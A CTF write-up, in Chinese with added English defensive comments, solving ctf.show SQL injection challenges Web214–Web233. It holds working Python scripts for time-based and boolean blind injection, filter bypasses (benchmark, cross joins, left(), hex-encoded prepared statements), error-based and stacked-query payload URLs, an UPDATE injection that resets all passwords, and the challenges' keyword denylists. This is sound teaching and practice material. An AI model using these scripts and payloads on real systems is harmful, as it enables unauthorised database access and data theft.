参考:
https://blog.csdn.net/solitudi/article/details/110144623
Web214
在首页的select.js中可以看到:
向/api/提交了两个参数:ip和debug。
经过手动测试,参数ip可以进行sql注入,如下会有延迟:
基于此可以写出基于时间盲注的脚本:
import requests
# Challenge instance used in the write-up (ctf.show lab URL).
url="http://38d705ce-9c40-4fb0-a976-279938603fa8.challenge.ctf.show:8080/api/"
# Form body for /api/: `ip` is the parameter the write-up found injectable,
# `debug` is sent along unchanged.
data={
    'ip':'',
    'debug':0
}
result=''   # characters recovered so far
i=0         # 1-based position of the character currently being probed
# Time-based blind extraction. For each position the ASCII value is binary-searched
# in [32, 127); the server leaks one bit per request through its response time,
# because the injected sleep(1) only fires when the real character is > mid.
# Defender's view: this shows up as a burst of POSTs to /api/ whose `ip` value
# contains if(/substr(/sleep( and whose response times cluster at ~1 s — an easy
# log and WAF signature. The root cause is `ip` being concatenated into SQL;
# binding it as a prepared-statement parameter closes the channel entirely.
while True:
    i=i+1
    start=32
    end=127
    while start<end:
        mid=(start+end)>>1
        # Earlier enumeration stages kept from the write-up (table names, then column names).
        #payload='select group_concat(table_name) from information_schema.tables where table_schema=database()'
        #payload='select group_concat(column_name) from information_schema.columns where table_name="ctfshow_flagx"'
        payload='select flaga from ctfshow_flagx'
        data['ip']=f'if(ascii(substr(({payload}),{i},1))>{mid},sleep(1),1)'
        try:
            # timeout=1 equals the injected delay, so a delayed reply surfaces as an exception.
            res=requests.post(url,data,timeout=1)
            end=mid       # answered in time: character is <= mid
        except Exception as e:
            start=mid+1   # timed out (or any other request failure): treated as character > mid
    # ASCII 32 doubles as the end-of-string sentinel: past the end substr() yields ''
    # and ascii('') is 0 in MySQL, so the search bottoms out at the lower bound.
    if start!=32:
        result=result+chr(start)
    else:
        break
print(result)
Web215
相比于上一题,多一个单引号闭合,修改一下 `data['ip']` 即可:
import requests
# Challenge instance used in the write-up (ctf.show lab URL).
url="http://df43f1cf-6768-49ed-8eb1-e89e9f61313b.challenge.ctf.show:8080/api/"
# Form body for /api/; `ip` is the injectable parameter.
data={
    'ip':'',
    'debug':0
}
result=''   # characters recovered so far
i=0         # 1-based position of the character currently being probed
# Same time-based binary search as the previous script. The only difference is the
# payload shape: the value sits inside a single-quoted string in the query, so the
# payload starts with `1'` to close it and ends with `#` to comment out the rest.
# Defender's view: identical traffic pattern (bursts of POSTs carrying sleep(),
# ~1 s responses); quoting the value does not help — parameter binding does.
while True:
    i=i+1
    start=32
    end=127
    while start<end:
        mid=(start+end)>>1
        # Earlier enumeration stages kept from the write-up.
        #payload='select group_concat(table_name) from information_schema.tables where table_schema=database()'
        #payload='select group_concat(column_name) from information_schema.columns where table_name="ctfshow_flagxc"'
        payload='select flagaa from ctfshow_flagxc'
        data['ip']=f"1' or if(ascii(substr(({payload}),{i},1))>{mid},sleep(1),1)#"
        try:
            # timeout equals the injected delay; a timeout is read as "condition true".
            res=requests.post(url,data,timeout=1)
            end=mid       # answered in time: character is <= mid
        except Exception as e:
            start=mid+1   # timed out (or any other failure): character is > mid
    # ASCII 32 acts as the end-of-string sentinel (ascii('') is 0 in MySQL).
    if start!=32:
        result=result+chr(start)
    else:
        break
print(result)
Web216
查询语句如下:
where id = from_base64($id);
`1` 的base64编码为 `MQ==`
脚本如下:
import requests
# Challenge instance used in the write-up (ctf.show lab URL).
url="http://82e0e04e-09e3-4e96-abed-5424c94f5820.challenge.ctf.show:8080/api/"
# Form body for /api/; `ip` is the injectable parameter.
data={
    'ip':'',
    'debug':0
}
result=''   # characters recovered so far
i=0         # 1-based position of the character currently being probed
# Same time-based binary search; here the query wraps the value as from_base64('…'),
# so the payload supplies a valid base64 value ('MQ==' decodes to '1') and then
# closes the quote and the from_base64() call before the injected condition.
# Defender's view: decoding the input inside SQL does not make it safe — the raw
# string is still concatenated into the statement. Bind it as a parameter instead.
while True:
    i=i+1
    start=32
    end=127
    while start<end:
        mid=(start+end)>>1
        # Earlier enumeration stages kept from the write-up.
        #payload='select group_concat(table_name) from information_schema.tables where table_schema=database()'
        #payload='select group_concat(column_name) from information_schema.columns where table_name="ctfshow_flagxcc"'
        payload='select flagaac from ctfshow_flagxcc'
        data['ip']=f"'MQ==') or if(ascii(substr(({payload}),{i},1))>{mid},sleep(1),1)#"
        try:
            res=requests.post(url,data,timeout=1)
            end=mid       # answered in time: character is <= mid
        except Exception as e:
            start=mid+1   # timed out (or any other failure): character is > mid
    # ASCII 32 acts as the end-of-string sentinel (ascii('') is 0 in MySQL).
    if start!=32:
        result=result+chr(start)
    else:
        break
print(result)
Web217
//查询语句:
where id = ($id);
// "block dangerous elements" (original comment)
/**
 * Keyword denylist that is the challenge's only input filter.
 *
 * @param string $str the raw request parameter
 * @return int|false 1 when the pattern matches (caller treats this as "block"),
 *                   0 otherwise, false on a regex error
 *
 * NOTE: a case-insensitive match on one function name only removes that one
 * spelling; as the write-up shows, other MySQL constructs produce the same
 * measurable delay. The fix that closes the whole class is binding $id as a
 * prepared-statement parameter instead of concatenating it into the query.
 */
function waf($str){
    return preg_match('/sleep/i',$str);
}
`sleep` 被ban了,使用 `benchmark` 绕过:
所以脚本如下,根据网络环境需要调整一下timeout,根据前几位的结果进行调整,因为我们知道flag是以 `ctfshow` 开头的:
import requests
import time
# Challenge instance used in the write-up (ctf.show lab URL).
url="http://24cbb5a9-acb5-4df7-9eb7-9105cf16c0f3.challenge.ctf.show:8080/api/"
# Form body for /api/; `ip` is the injectable parameter.
data={
    'ip':'',
    'debug':0
}
result=''   # characters recovered so far
i=0         # 1-based position of the character currently being probed
# Same binary search, but the delay comes from a CPU-bound benchmark() call rather
# than sleep(), because the challenge's filter denylists the word "sleep".
# The delay length now depends on server load, hence the larger timeout and the
# write-up's advice to tune it against the known "ctfshow" prefix.
# Defender's view: this variant is visible as CPU spikes on the database host and
# slow /api/ responses; a keyword denylist only moves the attacker to the next
# construct, whereas a parameterized query removes the injection point.
while True:
    i=i+1
    start=32
    end=127
    while start<end:
        mid=(start+end)>>1
        # Earlier enumeration stages kept from the write-up.
        #payload='select group_concat(table_name) from information_schema.tables where table_schema=database()'
        #payload='select group_concat(column_name) from information_schema.columns where table_name="ctfshow_flagxccb"'
        payload='select flagaabc from ctfshow_flagxccb'
        data['ip']=f"1) or if(ascii(substr(({payload}),{i},1))>{mid},benchmark(10000000,sha(1)),1)#"
        try:
            res=requests.post(url,data,timeout=4)
            end=mid       # answered in time: character is <= mid
        except Exception as e:
            start=mid+1   # timed out (or any other failure): character is > mid
        # NOTE(review): the pasted source lost its indentation; this pause is placed
        # after every request — confirm against the original if it mattered.
        time.sleep(0.2)
    # ASCII 32 acts as the end-of-string sentinel (ascii('') is 0 in MySQL).
    if start!=32:
        result=result+chr(start)
    else:
        break
print(result)
还有很多其他的时间盲注姿势,参考:
https://xz.aliyun.com/t/5505
Web218
//查询语句
where id = ($id);
// "block dangerous elements" (original comment)
/**
 * Keyword denylist that is the challenge's only input filter.
 *
 * @param string $str the raw request parameter
 * @return int|false 1 when the pattern matches (caller treats this as "block"),
 *                   0 otherwise, false on a regex error
 *
 * NOTE: extending the denylist from "sleep" to "sleep|benchmark" still leaves
 * every other way of making a query slow (the write-up uses a large cross join).
 * Denylists chase spellings; a prepared statement with $id bound as a parameter
 * removes the injection point regardless of spelling.
 */
function waf($str){
    return preg_match('/sleep|benchmark/i',$str);
}
`benchmark` 也被ban了,使用笛卡尔积盲注:
import requests
# Challenge instance used in the write-up (ctf.show lab URL).
url="http://e5bbbb2f-785a-406a-b502-2c5ef04693bc.challenge.ctf.show:8080/api/"
# Form body for /api/; `ip` is the injectable parameter.
data={
    'ip':'',
    'debug':0
}
result=''   # characters recovered so far
# Candidate alphabet tried at every position; characters outside it cannot be matched.
strr = "1234567890{}-qazwsxedcrfvtgbyhnujmikolp_"
i=0         # 1-based position of the character currently being probed
# Delay-based probing without sleep() or benchmark(): when the guessed character
# matches, the server evaluates a count(*) over a cross join of information_schema
# tables, which is slow enough to exceed the 0.1 s client timeout. Each position is
# tested character by character (no binary search). As written the outer loop has no
# exit condition, so the script runs until it is interrupted.
# Defender's view: the signature is many near-identical POSTs whose `ip` value
# contains information_schema cross joins, plus database load spikes. The fix is
# the same as for the earlier variants: bind `ip` as a query parameter.
while True:
    i=i+1
    for j in strr:
        # Earlier enumeration stages kept from the write-up.
        #payload='select group_concat(table_name) from information_schema.tables where table_schema=database()'
        #payload='select group_concat(column_name) from information_schema.columns where table_name="ctfshow_flagxc"'
        payload='select flagaac from ctfshow_flagxc'
        data['ip']=f"1) or if(substr(({payload}),{i},1)='{j}',(SELECT count(*) FROM information_schema.columns A, information_schema.schemata B, information_schema.schemata C, information_schema.schemata D,information_schema.schemata E),1)#"
        try:
            # A fast reply means the character did not match; nothing is recorded.
            res=requests.post(url,data,timeout=0.1)
        except Exception as e:
            # Timeout (or any other request failure) is read as "character matched".
            result=result+j
            # NOTE(review): indentation was lost in the paste; the progress print is
            # assumed to sit inside the except branch — confirm against the original.
            print(result)
Web219
//查询语句
where id = ($id);
// "block dangerous elements" (original comment)
/**
 * Keyword denylist that is the challenge's only input filter.
 *
 * @param string $str the raw request parameter
 * @return int|false 1 when the pattern matches (caller treats this as "block"),
 *                   0 otherwise, false on a regex error
 *
 * NOTE: adding "rlike" to the list does not affect the cross-join delay used
 * against the previous challenge, which is why the write-up reuses that script.
 * Parameter binding, not a longer denylist, is the durable fix.
 */
function waf($str){
    return preg_match('/sleep|benchmark|rlike/i',$str);
}
同上。
Web220
//查询语句
where id = ($id);
// "block dangerous elements" (original comment)
/**
 * Keyword denylist that is the challenge's only input filter.
 *
 * @param string $str the raw request parameter
 * @return int|false 1 when the pattern matches (caller treats this as "block"),
 *                   0 otherwise, false on a regex error
 *
 * NOTE: this version also bans the usual string-slicing and encoding helpers
 * (ascii, hex, concat, mid, substr), yet MySQL has further string functions that
 * are not listed (the write-up uses left()). Each extension of the denylist only
 * narrows, never closes, the injection; binding $id as a parameter closes it.
 */
function waf($str){
    return preg_match('/sleep|benchmark|rlike|ascii|hex|concat_ws|concat|mid|substr/i',$str);
}
`substr` 被ban了,使用 `left` 绕过,仍然配合笛卡尔积进行时间盲注:
import requests
import time
# Challenge instance used in the write-up (ctf.show lab URL).
url = "http://099770ae-e66d-4ba8-8b1a-d85fd399639b.challenge.ctf.show:8080/api/"
# Candidate alphabet tried at every position; characters outside it cannot be matched.
strr = "c_1234567890{}-qazwsxedrfvtgbyhnujmikolp"
# Earlier enumeration stages kept from the write-up.
#payload = "select table_name from information_schema.tables where table_schema=database() limit 0,1"
# payload = "select column_name from information_schema.columns where table_name='ctfshow_flagxcac' limit 1,1"
payload = "select flagaabcc from ctfshow_flagxcac"
j = 1      # length of the prefix currently being tested
res = ""   # prefix recovered so far
# Prefix-based variant of the cross-join timing probe: since substr() is filtered,
# the whole known prefix plus one candidate character is compared with left(...).
# For each candidate the character is appended to `res`; a fast reply means no
# match and the character is stripped again; a timeout keeps it and advances `j`.
# Defender's view: same observable pattern as the previous script (bursts of POSTs
# with information_schema cross joins in `ip`, database load spikes); the durable
# fix is binding `ip` as a parameter rather than extending the keyword denylist.
while 1:
    print("############")
    print(j)
    for i in strr:
        res += i
        data = {
            'ip': f"1) or if(left(({payload}),{j}) = '{res}',(SELECT count(*) FROM information_schema.tables A, information_schema.schemata B, information_schema.schemata D, information_schema.schemata E, information_schema.schemata F,information_schema.schemata G, information_schema.schemata H,information_schema.schemata I),1",
            'debug': '1'
        }
        try:
            r = requests.post(url, data=data, timeout=3)
            time.sleep(0.2)
            res = res[:-1]   # answered in time: candidate was wrong, drop it
        except Exception as e:
            # Timeout (or any other request failure) is read as "prefix matched".
            print(res)
            j+=1
            break
Web221
//分页查询
$sql = select * from ctfshow_user limit ($page-1)*$limit,$limit;
MySQL利用procedure analyse()函数优化表结构
UNION语句中不允许使用PROCEDURE子句。
参考:https://www.docs4dev.com/docs/zh/mysql/5.7/reference/procedure-analyse.html
基于此,可以构造报错注入:
http://a4d802b0-9f96-436a-9019-353892921a86.challenge.ctf.show:8080/api/?page=1&limit=10 procedure analyse(extractvalue(rand(),concat(0x3a,database())),2)
Web222
提示是group注入:
这里面group by报错注入失败了,那么直接在group by后面拼接上时间盲注,类似于:
select * from ctfshow_user group by 1,if(1=1,sleep(1),1);
因为每则数据都需要group by归类,所以都会执行sleep语句,那么有几条数据就会执行几次sleep。脚本如下:
import requests
# Challenge instance used in the write-up (ctf.show lab URL).
url = "http://e7303740-a1d0-4c22-ae06-7cd02332a4c4.challenge.ctf.show:8080/api/"
# Earlier enumeration stages kept from the write-up.
#payload = "select group_concat(table_name) from information_schema.tables where table_schema=database()"
#payload = "select column_name from information_schema.columns where table_name='ctfshow_flaga' limit 1,1"
payload = "select flagaabc from ctfshow_flaga"
res = ""   # characters recovered so far
i=0        # 1-based position of the character currently being probed
# Time-based binary search delivered through the GET parameter `u`, which the
# write-up says is concatenated into a GROUP BY clause. The injected expression is
# evaluated once per grouped row, so a short sleep(0.1) accumulates across rows —
# hence the 0.5 s client timeout.
# Defender's view: GET requests whose `u` contains if(/sleep( are easy to spot in
# access logs; the fix is to validate `u` against an allowlist of column names
# (ORDER BY / GROUP BY targets cannot be bound as parameters) rather than splicing it in.
while True:
    i=i+1
    start=32
    end=127
    while start<end:
        mid=(start+end)>>1
        params={
            'u':f"1,if(ascii(substr(({payload}),{i},1))>{mid},sleep(0.1),1)"
        }
        try:
            r=requests.get(url,params=params,timeout=0.5)
            end=mid       # answered in time: character is <= mid
        except Exception as e:
            start=mid+1   # timed out (or any other failure): character is > mid
    # ASCII 32 acts as the end-of-string sentinel (ascii('') is 0 in MySQL).
    if start!=32:
        res=res+chr(start)
    else:
        break
print(res)
Web223
在提交的时候,`u=username` 时返回结果如下:
`u!=username` 时返回结果如下:
和上一题相似,可以构造盲注。不过数字被ban了,使用 `True` 绕过:
脚本如下:
import requests
# Challenge instance used in the write-up (ctf.show lab URL).
url = "http://fc7dc547-ebe4-4a50-baa9-005f5f76bef9.challenge.ctf.show:8080/api/"
# Earlier enumeration stages kept from the write-up.
#payload = "select group_concat(table_name) from information_schema.tables where table_schema=database()"
#payload = "select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagas'"
payload = "select flagasabc from ctfshow_flagas"
flag = ""   # characters recovered so far
i=0         # 1-based position of the character currently being probed
def gettrue(num: int) -> str:
    """Return *num* copies of the literal ``true`` joined with ``+``.

    The challenge rejects digit characters, so every integer that the injected
    expression needs is spelled as ``true+true+...`` (MySQL evaluates each
    ``true`` as 1). Any ``num`` below 1 yields a single ``true``, matching the
    original implementation.

    >>> gettrue(3)
    'true+true+true'
    """
    copies = max(num, 1)
    return "+".join(["true"] * copies)
# Boolean-based (not time-based) binary search: the injected if() returns the
# `username` column when the guessed bound holds, which makes the query match a
# user and puts the string "userAUTO" in the response; otherwise it returns 'a'.
# Every numeric literal is replaced by gettrue(...) because digits are filtered.
# Defender's view: the tell-tale is many GETs whose `u` contains if(ascii(substr(
# with long true+true+... runs; the fix is to allowlist `u` against the set of
# valid column names instead of concatenating it into the query.
while True:
    i=i+1
    start=32
    end=127
    while start<end:
        mid=(start+end)>>1
        params={
            'u':f"if(ascii(substr(({payload}),{gettrue(i)},{gettrue(1)}))>{gettrue(mid)},username,'a')"
        }
        r=requests.get(url,params=params)
        if "userAUTO" in r.text:
            start=mid+1   # condition held: character is > mid
        else:
            end=mid       # condition failed: character is <= mid
    # ASCII 32 acts as the end-of-string sentinel (ascii('') is 0 in MySQL).
    if start != 32:
        flag=flag+chr(start)
    else:
        break
print(flag)
Web224
`/robots.txt`:
User-agent: *
Disallow: /pwdreset.php
登陆进去以后是管理员密码重置:
重置后即可登录,进去以后发现是文件上传:
不过并不是单纯的文件上传,毕竟是SQL注入里面的题目,参考:
https://www.gem-love.com/ctf/2283.html#%E4%BD%A0%E6%B2%A1%E8%A7%81%E8%BF%87%E7%9A%84%E6%B3%A8%E5%85%A5
大概流程就是上传图片马,解析时候造成SQL注入写shell,然后访问shell进行命令执行。
Web225
提示说是堆叠注入:
// "paginated query" (original comment)
// $username is interpolated straight into the statement. The trailing ';' plus a
// driver that accepts several statements is what makes stacked queries possible.
$sql = "select id,username,pass from ctfshow_user where username = '{$username}';";
// "the master says the more you filter the better" (original comment)
// Keyword denylist; $ret is defined elsewhere in the challenge source (not shown).
// NOTE: blocking these verbs does not stop the statements the write-up uses
// (SHOW, HANDLER, PREPARE ... FROM a string). A bound parameter for $username
// and a connection that does not allow multi-statements would close both paths.
if(preg_match('/file|into|dump|union|select|update|delete|alter|drop|create|describe|set/i',$username)){
    die(json_encode($ret));
}
方法一:使用handler语句,参考:
https://blog.csdn.net/JesseYoung/article/details/40785137
payload如下:
http://e2dcbccb-a399-4336-8102-60aa9e5c00c5.challenge.ctf.show:8080/api/?username=ctfshow';show%20tables;handler ctfshow_flagasa open;handler ctfshow_flagasa read first;
方法二:使用 `concat()` 拼接sql语句来绕过敏感词。
参考:https://blog.csdn.net/solitudi/article/details/107823398
payload如下:
http://e2dcbccb-a399-4336-8102-60aa9e5c00c5.challenge.ctf.show:8080/api/?username=';prepare p from concat('s','elect',' * from ctfshow_flagasa');execute p;
Web226
// "paginated query" (original comment)
// $username is interpolated straight into the statement (stacked queries possible).
$sql = "select id,username,pass from ctfshow_user where username = '{$username}';";
// "the master says the more you filter the better" (original comment)
// Keyword denylist, now also banning "show" and the '(' character;
// $ret is defined elsewhere in the challenge source (not shown).
// NOTE: the denylist inspects the literal request text, so a statement supplied to
// PREPARE as a hex string never contains a banned word. This is the general
// weakness of input denylists — they see a spelling, not the SQL that executes.
if(preg_match('/file|into|dump|union|select|update|delete|alter|drop|create|describe|set|show|\(/i',$username)){
    die(json_encode($ret));
}
过滤的更多了,不过还是使用 `prepare` 来绕过。因为这是根据一串字符串去生成sql语句,所以可以直接上16进制字符串,所以payload如下:
http://0d6ac274-9bb0-4a78-8378-4549d3fdd18c.challenge.ctf.show:8080/api/?username=';prepare p from 0x73656c656374202a2066726f6d2063746673685f6f775f666c61676173;execute p;
//也就是
http://0d6ac274-9bb0-4a78-8378-4549d3fdd18c.challenge.ctf.show:8080/api/?username=';prepare p from select * from ctfsh_ow_flagas;execute p;
Web227
这一题需要去查看存储过程。
参考:https://blog.csdn.net/qq_41573234/article/details/80411079
绕过的方法和上一题一样,不过要先查看存储过程(发现直接能找到flag),在表里面找不到flag:
payload如下:
http://1dd857dd-4863-4914-80ae-44d6c7786e23.challenge.ctf.show:8080/api/?username=';prepare p from 0x73656c656374202a2066726f6d20696e666f726d6174696f6e5f736368656d612e726f7574696e6573;execute p;
//也就是
http://1dd857dd-4863-4914-80ae-44d6c7786e23.challenge.ctf.show:8080/api/?username=';prepare p from select * from information_schema.routines;execute p;
然后再调用存储过程即可:
http://1dd857dd-4863-4914-80ae-44d6c7786e23.challenge.ctf.show:8080/api/?username=';call getFlag();
Web228
同Web226。
Web229
同Web226
Web230
同Web226
Web231
// "paginated query" (original comment — the statement is actually a password update)
// Both $password and $username are interpolated unescaped into an UPDATE; a
// crafted $password can rewrite the WHERE clause (see the write-up) or extra SET
// columns. Binding both values as prepared-statement parameters prevents this.
$sql = "update ctfshow_user set pass = '{$password}' where username = '{$username}';";
这是一条更新密码的语句,先输入如下payload:
password=1' where 1=1#&username=1
发现的确可以将所有密码改为 `1`:
那么因为是有回显的,可以直接将用户名改为我们想要的东西。为什么不直接改密码:因为密码的值被单引号包裹,其中的是字符串不是sql语句。
payload如下:
password=1',username= (select flagas from flaga ) where 1#&username=1
Web232
// "paginated query" (original comment — the statement is actually a password update)
// Hashing with md5() inside SQL does not sanitize: $password is still spliced into
// the statement text before the query runs. Hash in PHP and bind the result.
$sql = "update ctfshow_user set pass = md5('{$password}') where username = '{$username}';";
和上面差不多,就是用 `')` 闭合即可。
Web233
// "paginated query" (original comment — the statement is actually a password update)
// Same unescaped interpolation as before; the write-up notes the earlier direct
// rewrite no longer works here and falls back to time-based probing via $username.
// Parameter binding for both values is the fix in every one of these variants.
$sql = "update ctfshow_user set pass = '{$password}' where username = '{$username}';";
之前的做法不行了,改用盲注,脚本如下:
import requests
# Challenge instance used in the write-up (ctf.show lab URL).
url = "http://944917c4-85c8-4fe6-9b4d-b5896c20dfd9.challenge.ctf.show:8080/api/"
# Earlier enumeration stages kept from the write-up.
#payload = "select group_concat(table_name) from information_schema.tables where table_schema=database()"
#payload = "select group_concat(column_name) from information_schema.columns where table_name='flag233333'"
payload = "select flagass233 from flag233333"
flag = ""   # characters recovered so far
i=0         # 1-based position of the character currently being probed
# Time-based binary search through the `username` field of the password-update
# form: the value closes the surrounding quote, injects an if(... sleep(0.1) ...)
# condition and comments out the rest. `password` is a dummy value.
# Defender's view: bursts of POSTs to /api/ with sleep( inside `username`, and a
# password-reset endpoint answering slowly, are the signals; binding both values
# as prepared-statement parameters removes the injection.
while True:
    i=i+1
    start=32
    end=127
    while start<end:
        mid=(start+end)>>1
        data={
            'username':f"1' or if(ascii(substr(({payload}),{i},1))>{mid},sleep(0.1),1)#",
            'password':'1'
        }
        try:
            r=requests.post(url,data=data,timeout=2)
            end=mid       # answered in time: character is <= mid
        except Exception as e:
            start=mid+1   # timed out (or any other failure): character is > mid
    # ASCII 32 acts as the end-of-string sentinel (ascii('') is 0 in MySQL).
    if start!=32:
        flag=flag+chr(start)
    else:
        break
print(flag)